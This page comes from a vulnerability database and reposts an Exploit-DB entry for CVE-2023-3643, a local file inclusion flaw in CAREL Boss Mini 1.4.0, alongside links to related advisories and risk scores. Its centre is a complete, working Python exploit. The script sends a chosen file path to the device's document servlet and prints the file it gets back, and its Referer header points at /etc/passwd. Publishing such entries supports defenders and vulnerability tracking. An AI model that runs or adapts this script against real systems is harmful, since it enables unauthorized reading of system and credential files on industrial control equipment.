Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Boss Mini 1.4.0 - local file inclusion

🗓️ 03 Mar 2024 00:00:00Reported by nltt0Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 341 Views

Boss Mini 1.4.0 local file inclusion exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Boss Mini 1.4.0 - local file inclusion Exploit
4 Mar 202400:00
zdt
Circl		CVE-2023-3643
12 Jul 202322:25
circl
CNNVD		Carel Boss Mini 安全漏洞
12 Jul 202300:00
cnnvd
CVE		CVE-2023-3643
12 Jul 202317:31
cve
Cvelist		CVE-2023-3643 Boss Mini document file inclusion
12 Jul 202317:31
cvelist
Exploit DB		Boss Mini v1.4.0 - Local File Inclusion (LFI)
3 Mar 202600:00
exploitdb
EUVD		EUVD-2023-44287
12 Jul 202317:31
euvd
ICS		CAREL Boss-Mini
20 Jun 202406:00
ics
Nuclei		CAREL Boss Mini <= 1.4.0 - Local File Inclusion
3 Jun 202606:04
nuclei
NVD		CVE-2023-3643
12 Jul 202318:15
nvd
Rows per page
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# CVE: CVE-2023-3643


'''
 _____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                           |___/                  

'''

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
       

except Exception as e:
    print('Error in {}'.format(e))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Mar 2024 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.35215
exploitboss minilocal file inclusioncve-2023-3643pythonrequestsargumentparserurllibhost headeruser-agent headercontent-type headeraccept headerreferer headerpost requestverify parameter
341